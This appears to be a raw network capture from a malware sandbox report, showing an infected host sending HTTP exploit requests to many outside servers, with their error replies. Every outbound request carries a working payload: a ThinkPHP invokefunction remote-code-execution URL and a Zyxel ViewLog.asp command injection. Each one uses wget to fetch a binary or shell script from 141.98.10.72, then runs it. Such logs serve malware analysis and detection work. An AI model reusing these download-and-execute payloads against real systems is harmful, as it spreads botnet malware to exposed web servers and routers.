                                                        251192.168.2.144098895.64.185.17480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.293023109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:27.533502102 CET242INHTTP/1.0 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 113
                                                        Date: Wed, 09 Jun 1971 02:42:14 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        252192.168.2.145113295.86.103.19780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.307526112 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        253192.168.2.1446504112.185.217.18980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.762743950 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:28.042907000 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:26 GMT
                                                        Server: lighttpd/1.4.35
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        254192.168.2.1460720112.78.212.880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.782145977 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:28.084934950 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        255192.168.2.1440300112.132.209.980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.851196051 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:28.212387085 CET477INHTTP/1.1 400 Bad Request
                                                        Server: kngx/1.10.2
                                                        Date: Wed, 14 Feb 2024 08:33:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 172
                                                        Connection: close
                                                        KS-Deny-Reason: client|81.181.57.74|cdnhfun03-cache08.cdnhfun03.ksyun.com|proxy|client-sent-HTTP/1.1-request-without-Host-header
                                                        x-link-via: hfun03:80;
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 6e 67 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>kngx/1.10.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        256192.168.2.1449250119.201.85.10323
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.934726000 CET179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 37 3a 33 33 3a 33 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 49 6e 76 61 6c 69 64 20 75 73 65 72 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 17:33:30Auth Result: Invalid user.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        257192.168.2.145791694.16.107.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.978820086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.194542885 CET283INHTTP/1.1 405 Method Not Allowed
                                                        transfer-encoding: chunked
                                                        content-type: text/plain; charset=utf-8
                                                        content-encoding: gzip
                                                        vary: accept-encoding
                                                        date: Wed, 14 Feb 2024 08:33:27 GMT
                                                        Data Raw: 41 0d 0a 1f 8b 08 00 00 00 00 00 04 ff 0d 0a 33 39 0d 0a 15 c6 b1 0d 00 20 0c 03 b0 57 b2 b1 71 0c 2f 40 24 3a 00 a2 4d ff 47 6c 6e bc c9 10 86 0d ec 23 2c 52 d0 b4 80 33 4e 7a 67 f9 bc 69 ce c5 ad a8 0f ab ea 89 a0 32 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: A39 Wq/@$:MGln#,R3Nzgi20


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        258192.168.2.145093831.136.246.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.986602068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:31.112010956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:37.255723000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:49.287259102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.634221077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.780198097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        259192.168.2.145852831.136.20.1158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.988486052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:31.112006903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:37.255724907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:49.287237883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:14.634221077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.780170918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        260192.168.2.145681895.23.38.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.002274990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.220206022 CET464INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:33:28 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1;mode=block
                                                        Cache-Control: no-store
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        261192.168.2.143491694.26.10.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.005235910 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:28.256428003 CET109INHTTP/1.1 302 Found
                                                        Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        262192.168.2.145130894.120.101.28080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.010478973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        263192.168.2.145113262.29.112.1008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.012363911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        264192.168.2.144521494.121.107.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.031826973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        265192.168.2.144449094.122.113.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:28.032290936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


